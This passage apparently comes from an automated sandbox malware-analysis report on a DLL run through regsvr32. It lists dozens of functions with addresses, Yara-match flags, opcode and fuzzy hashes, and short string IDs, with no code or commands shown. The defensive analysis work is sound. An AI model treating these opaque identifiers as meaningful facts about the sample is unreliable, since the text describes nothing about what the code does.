                                    • Opcode ID: 915272897a82389ccaff6fb74a1b6d3f763f551119c92165f64424d72f92453c
                                    • Instruction ID: 9062cfcdbd96f40b118b25d613ee2554a2eb62b456f013d12e1abcba11dd4c76
                                    • Opcode Fuzzy Hash: 915272897a82389ccaff6fb74a1b6d3f763f551119c92165f64424d72f92453c
                                    • Instruction Fuzzy Hash: AD4104B090034E8BCB48CF68C4865DE7FB0FB48358F11861DE85AAA250D7749664CFC4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800257C0 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0FT
                                    • API String ID: 0-3306264968
                                    • Opcode ID: 221a7c3e7820f489f33ab0bfd813c90db956588b7e3f278aa32cbc5897504973
                                    • Instruction ID: 6bc0069c9e8fc616ccef226ca938112ebcbb35ca2f33a2ab28ad344b092e513b
                                    • Opcode Fuzzy Hash: 221a7c3e7820f489f33ab0bfd813c90db956588b7e3f278aa32cbc5897504973
                                    • Instruction Fuzzy Hash: 30419FB090078E8FCB49CF64C88A5DE7BB0FB18358F104A19E866A7250D7B8D665CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000E638 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: [Mh<
                                    • API String ID: 0-3342980100
                                    • Opcode ID: 8db4eb38f9ab2c3bc7d36487ff8b598b8cd98b11ddd9dbc7aed51384deea61bf
                                    • Instruction ID: 3dfa530075d16dbdc0ab74c4fd592fdc9016efe2b3d8749faa49a3b984689735
                                    • Opcode Fuzzy Hash: 8db4eb38f9ab2c3bc7d36487ff8b598b8cd98b11ddd9dbc7aed51384deea61bf
                                    • Instruction Fuzzy Hash: 3D41B4B090034E8BDB88DF68C88A4DE7FF0FB58398F104619E855A6250D37496A4CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000C740 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: [*y
                                    • API String ID: 0-3642367475
                                    • Opcode ID: f920a7f17afa669f85dd4fa2bbc3f052cb99f05070bc78a3fd5f717c453881c3
                                    • Instruction ID: f49b88a051f724710f0cfdc48a2fab0be3c7391659c99e254e23c0044fb95fb4
                                    • Opcode Fuzzy Hash: f920a7f17afa669f85dd4fa2bbc3f052cb99f05070bc78a3fd5f717c453881c3
                                    • Instruction Fuzzy Hash: 9F318C746183858B8748DF28D45641ABBE1FBCC308F405B2DF8CAAB291D7789641CB8B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800117C4 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: dk
                                    • API String ID: 0-2586313868
                                    • Opcode ID: 8a4805f75226fc2840e2c7b063b7b1e39b1ba6f4f5ce1306a123ad924c24cf9d
                                    • Instruction ID: bd21a50a93d9ce141822b95cdb4ee263f008649e2ad7f0911c2a62c734e6813a
                                    • Opcode Fuzzy Hash: 8a4805f75226fc2840e2c7b063b7b1e39b1ba6f4f5ce1306a123ad924c24cf9d
                                    • Instruction Fuzzy Hash: 8631E4B0508B808BC75CDF28C49A51BBBF1FBC6354F504A1CF686863A0DBB6D849CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000B444 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: m?@
                                    • API String ID: 0-4017832957
                                    • Opcode ID: 92bb4875fae3dfbb536cc4a594f9b8f02b4b9fef725d60d218a6fcb850c1db5e
                                    • Instruction ID: 763f89865c62d32814b91696e152b9bff8d9fc03c4acc356d14baff2dc9750fc
                                    • Opcode Fuzzy Hash: 92bb4875fae3dfbb536cc4a594f9b8f02b4b9fef725d60d218a6fcb850c1db5e
                                    • Instruction Fuzzy Hash: B231BF752187858BC749DF28C04A41ABBE1FB8D30CF504B2DF4CAA6350D778D616CB4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800064D0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: MR
                                    • API String ID: 0-1985102067
                                    • Opcode ID: c3045b5f67f41fb122cd1cd8de18bcca47d48181f2768d112050a64545bdb3cc
                                    • Instruction ID: 3dc758c2b0da019c4ef40f7354f1f5afd613488c2e2992af3e697213e5bda16f
                                    • Opcode Fuzzy Hash: c3045b5f67f41fb122cd1cd8de18bcca47d48181f2768d112050a64545bdb3cc
                                    • Instruction Fuzzy Hash: 9F215CB05187808BD749DF28C55941EBBE1BB9D30CF804B2DF4CAAA251D778DA05CF4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180010050 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: h{9
                                    • API String ID: 0-709585855
                                    • Opcode ID: 158519ec253ad62ee934b2a1f06c22473a728e5d40c1cbc8d8e2591bd6c1f9a1
                                    • Instruction ID: 28d7748f9e23597285172eede27c795ca80d4d45ffdf147c2eecc812d7a7424c
                                    • Opcode Fuzzy Hash: 158519ec253ad62ee934b2a1f06c22473a728e5d40c1cbc8d8e2591bd6c1f9a1
                                    • Instruction Fuzzy Hash: A22180B152D785AFC788DF28C59991ABBE0FB98308F806E1DF9868A250D374D545CB43
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800036A8 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: =WQ
                                    • API String ID: 0-979633440
                                    • Opcode ID: beecb343f63eb420ad30c3b234d671f41fcffe89ae230601040905a52fbe6922
                                    • Instruction ID: f1c989dca105177ef840caf4573424004201902730bc760d24db79eb0592445f
                                    • Opcode Fuzzy Hash: beecb343f63eb420ad30c3b234d671f41fcffe89ae230601040905a52fbe6922
                                    • Instruction Fuzzy Hash: 2C2146746187848B8749DF28C44A51ABBE1BB8D30CF804B1DF8CAAB250D7789A05CB4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800202E0 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0d58b218a6fad6bc529337baac5d9ed9f8b1cbf9dbb0a3b92ec118c03c99fb86
                                    • Instruction ID: c77f93fcecba916d7a728a8c6eb3e78c0c4fd01b54dcd62d4346d4040ea08623
                                    • Opcode Fuzzy Hash: 0d58b218a6fad6bc529337baac5d9ed9f8b1cbf9dbb0a3b92ec118c03c99fb86
                                    • Instruction Fuzzy Hash: 28E11E7090470D8FCF59DF68D446AEE7BB6FB48344F504129EC4EAB251DB74AA08CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002A840 Relevance: .2, Instructions: 180COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1c8b8be56366865ecfdde9c8b2ec8895e219799960cb59c8d6409a7e773344f9
                                    • Instruction ID: 37013b96f87cdafdf9e9430ef7fa874701b46d6ad591addafa58d16b7588ecf0
                                    • Opcode Fuzzy Hash: 1c8b8be56366865ecfdde9c8b2ec8895e219799960cb59c8d6409a7e773344f9
                                    • Instruction Fuzzy Hash: 7E811370D047098FDB89CFA8D4856EEBBF1FB48314F14812EE846B6250CB788A49CF59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180025E88 Relevance: .2, Instructions: 167COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 636ed3c89b38e63114f2d2672b542ea9429d7597145989221425ac881483aa9e
                                    • Instruction ID: 9c3afdfbfdf497047419e96e23ac648a32a0c35cf7c10b77ff2162508d5b9c58
                                    • Opcode Fuzzy Hash: 636ed3c89b38e63114f2d2672b542ea9429d7597145989221425ac881483aa9e
                                    • Instruction Fuzzy Hash: 68715B70A0460D8FCFA9DF64D0857EE77F2FB48348F109169E856972A2DB74DA18CB84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000E278 Relevance: .1, Instructions: 146COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62b2812e5277d79cf71890da185327c00cb0182960b11156e794a9778dcccdd1
                                    • Instruction ID: 96a2ca05932f578597b6f31f20a9b51789f655d9034ffcd243468df0dde1503e
                                    • Opcode Fuzzy Hash: 62b2812e5277d79cf71890da185327c00cb0182960b11156e794a9778dcccdd1
                                    • Instruction Fuzzy Hash: 8B6108B050424D8FCB99CF28C48A6DA7FE0FB58348F61422DF84AA6250D778D694CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180027C28 Relevance: .1, Instructions: 135COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a7e039c7e162bbace75073517b23d1c0edb14752be4eceffb74d3575dc747b7
                                    • Instruction ID: e11998f87687b7015f7b025411e2dba788bee123d684f62271b2fcc2a6602c8d
                                    • Opcode Fuzzy Hash: 0a7e039c7e162bbace75073517b23d1c0edb14752be4eceffb74d3575dc747b7
                                    • Instruction Fuzzy Hash: 74516C3011C7889FD7A9DF28C48A7ABBBF2FB88354F405A1DE4CA83251D775A5468B43
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001BF70 Relevance: .1, Instructions: 112COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 37b3c9751f9c0622dad5cee6893bdb18b89ef97b8e375e51f8b49718ad0ca1ed
                                    • Instruction ID: 3c9e139cfc3177b9e6430d12f2245ff46c98974f9447e7844960b67abc7cc201
                                    • Opcode Fuzzy Hash: 37b3c9751f9c0622dad5cee6893bdb18b89ef97b8e375e51f8b49718ad0ca1ed
                                    • Instruction Fuzzy Hash: 2C416E705197449FD7D5CF28C489B5EBBE0FB88744F80A92DF485C2291CB74C9498B03
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180021754 Relevance: .1, Instructions: 109COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d93e85a75c27503c9e550547e6f4dbe74bfd5b550d549da600d4a1fb4778da09
                                    • Instruction ID: 8d3aa2995036c6943faeb837d6d259061f9fd1ebb01e44e177952bfba46c1523
                                    • Opcode Fuzzy Hash: d93e85a75c27503c9e550547e6f4dbe74bfd5b550d549da600d4a1fb4778da09
                                    • Instruction Fuzzy Hash: BC51B5B190038E9FCB48CF68D8865DE7BF0FB48358F508A19F826A7250D3B49664CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180023220 Relevance: .1, Instructions: 108COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c2a73fccebe1b17c37a08eaad88bc03e676d8e4e44166d1bd6bc2a62feffe697
                                    • Instruction ID: 3bfbec68728c413781f4eceae801228648357d86044db0a2bb780f5116396d21
                                    • Opcode Fuzzy Hash: c2a73fccebe1b17c37a08eaad88bc03e676d8e4e44166d1bd6bc2a62feffe697
                                    • Instruction Fuzzy Hash: 4951B5B190074E8FCB48DFA8D88A5DE7BB1FB48348F04861DE826A7350D3B49564CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180014E98 Relevance: .1, Instructions: 100COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4330d8994c454f3a4ce2cb979804135e217ee49caa662d464dea2a0ef5ce2a30
                                    • Instruction ID: 53b90e1c5486c9cc5d3a4e2843fa79abd377b3644fddba8a35b35de5b3b72a9d
                                    • Opcode Fuzzy Hash: 4330d8994c454f3a4ce2cb979804135e217ee49caa662d464dea2a0ef5ce2a30
                                    • Instruction Fuzzy Hash: AA51A4B590038E8FCF48DF64C88A5DE7BB1FB48348F014A19E86AA6350D7B4D665CF85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180003D18 Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f6e19dd2ecc4b4f98e7bd80107de5ee987440c0ef4aaf5382ea96953c73351d3
                                    • Instruction ID: e1ff16132d2196f3f75472eef2dbafaed56c0de40c9f91af0ed0f4743424dce2
                                    • Opcode Fuzzy Hash: f6e19dd2ecc4b4f98e7bd80107de5ee987440c0ef4aaf5382ea96953c73351d3
                                    • Instruction Fuzzy Hash: 7241E3B190034A8FCB48CF68C8865DE7FB1FB58358F10861DE85AAA360D77496A4CFD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180018FE8 Relevance: .1, Instructions: 94COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 00ebc5b3581f268e1dca31b076cde8af601d69c20f797ec800b8524e8aca152a
                                    • Instruction ID: 71fd5f9204d30feec7a15df1bf9f79d56724cbe4fb23e8fa5a2523106a8ad13f
                                    • Opcode Fuzzy Hash: 00ebc5b3581f268e1dca31b076cde8af601d69c20f797ec800b8524e8aca152a
                                    • Instruction Fuzzy Hash: 2C51B2B080034E9FCB48CFA8D48A4DEBFF0FB58398F245619E859A6250D3749695CFD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800011F4 Relevance: .1, Instructions: 90COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1f4f6e8d1d7fb1cefad6bab8572f86962bf991beacb3f1c3af335354cec980e2
                                    • Instruction ID: 13dd754d1e7aaa458ccf3f25f1a53950ed55eb7a2af7c94b5f3f3eca6f4c7b71
                                    • Opcode Fuzzy Hash: 1f4f6e8d1d7fb1cefad6bab8572f86962bf991beacb3f1c3af335354cec980e2
                                    • Instruction Fuzzy Hash: 4141B3B090434E8FCB48DF68C48A4CE7FB0FB58398F204619E856A6250D3B496A5CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180003460 Relevance: .1, Instructions: 85COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b99b47e9b962ad4e889b98a468eb4c97838fe937d78fd3ed328a07435872d91a
                                    • Instruction ID: 25ea7a1fae7cee08e525b2e53d13b9e761fafe3c3046f9c16da3d4363f6b727f
                                    • Opcode Fuzzy Hash: b99b47e9b962ad4e889b98a468eb4c97838fe937d78fd3ed328a07435872d91a
                                    • Instruction Fuzzy Hash: 7641F0B090078E8BCF48CF68C88A4DE7FB0FB48358F54461DE86AA6350D3B49664CF85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000406C Relevance: .1, Instructions: 85COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 83981cbbf60b78e7deea3e04e91402b42a32efa8c5dfd88cb8f56556e6fb0c3c
                                    • Instruction ID: 2f3c92175ef08bfcd336efc03048a581a759bd19a61f5d08681f8b59d2b4a65d
                                    • Opcode Fuzzy Hash: 83981cbbf60b78e7deea3e04e91402b42a32efa8c5dfd88cb8f56556e6fb0c3c
                                    • Instruction Fuzzy Hash: CA41EF70508B898FE3A8DF29C48950BBBF2FBC5354F104A1DF69686360D7B5D845CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180019788 Relevance: .1, Instructions: 83COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 94030778b375274538e88af110c4c71a5f626c7493089532c44927a023a09910
                                    • Instruction ID: 881360cf52284626b478287e7223753f8540b5b8a242225130398fb52c45b4e6
                                    • Opcode Fuzzy Hash: 94030778b375274538e88af110c4c71a5f626c7493089532c44927a023a09910
                                    • Instruction Fuzzy Hash: 9141B1B090034E8FCF48CF68C48A5DEBFB0FB68398F214619E855A6250D3B496A5CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001B6D4 Relevance: .1, Instructions: 79COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 93974b6d4f6273d20610df347467165d2a5c3046e1daec97411395bd01693f1f
                                    • Instruction ID: 9c4ff176952ec0d3a7c23327861baecbe751e07bc56d6e6d0065064954d6898b
                                    • Opcode Fuzzy Hash: 93974b6d4f6273d20610df347467165d2a5c3046e1daec97411395bd01693f1f
                                    • Instruction Fuzzy Hash: D93113B0508B84CBD7B4DF24C08979ABBE0FBC4758F608A1CE5D9C6261DBB4984DDB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180012EF8 Relevance: .1, Instructions: 77COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 613fb402d6b778ceaf7e513f493c666c428009a0501ff02ca6debf04feb91865
                                    • Instruction ID: 2086fc6cf530452ca317dde1c3f5989bf97dc2ab51b7d711b1b7619edf53518f
                                    • Opcode Fuzzy Hash: 613fb402d6b778ceaf7e513f493c666c428009a0501ff02ca6debf04feb91865
                                    • Instruction Fuzzy Hash: 9A4107B090034D9FCF48DF68C89A5DEBFB1FB48358F10865DE96AA6250D3B49664CF84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000E7A0 Relevance: .1, Instructions: 70COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a391d5f1ee034caf47bfedc7cfbee3ee0130da0d99d6425c5f03999ced993457
                                    • Instruction ID: 1338ccaed59e81eda3dfb0132a5285c9e75a0d4e8ad1c64b0ac71650cc1258ea
                                    • Opcode Fuzzy Hash: a391d5f1ee034caf47bfedc7cfbee3ee0130da0d99d6425c5f03999ced993457
                                    • Instruction Fuzzy Hash: 5541E4B190075ECFCF44CFA8D88A4CE7BF0FB08358F144619E869A6210D3B49658CF99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180010C84 Relevance: .1, Instructions: 64COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fd33be4bf54c8c25dddb299aef1f30db163f836ea6c92e4bd2e4a70074cec26c
                                    • Instruction ID: 90c54515c462ca516bd1a7834683e0366852147f904ce70d700c1fd94530822e
                                    • Opcode Fuzzy Hash: fd33be4bf54c8c25dddb299aef1f30db163f836ea6c92e4bd2e4a70074cec26c
                                    • Instruction Fuzzy Hash: D33198B16187848BD788DF28D44941ABBE1FBDC30CF405B1DF4CAAA360D7789644CB4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800247FC Relevance: .1, Instructions: 61COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4dc2512c0ff6dc22a4fb7ff1d0ea1563faee4dc38c2ddbd287c0bb24e1b40528
                                    • Instruction ID: 9655ad274102c7f9d75b202b541ab5cd2305fe15ce58f1dcda736dbe1a9cecaf
                                    • Opcode Fuzzy Hash: 4dc2512c0ff6dc22a4fb7ff1d0ea1563faee4dc38c2ddbd287c0bb24e1b40528
                                    • Instruction Fuzzy Hash: 3B2146B46183858B8389DF28D04A41ABBE1FBCC308F905B1DF4CAAB254D77896558B4B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000EAC0 Relevance: .1, Instructions: 60COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 443cbba6f5f89cfce6496fb7e303af42859a42b87001d497a7063cf79c72ec44
                                    • Instruction ID: 28a8b9ee08791f4b35668e747dad36529c2fac2b53c208ad34d18e94405bcf7a
                                    • Opcode Fuzzy Hash: 443cbba6f5f89cfce6496fb7e303af42859a42b87001d497a7063cf79c72ec44
                                    • Instruction Fuzzy Hash: 8E21D870529784ABC788DF18C58A55ABBF0FBC5758F80691DF8C686251C7B4D906CB43
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001479C Relevance: .0, Instructions: 45COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
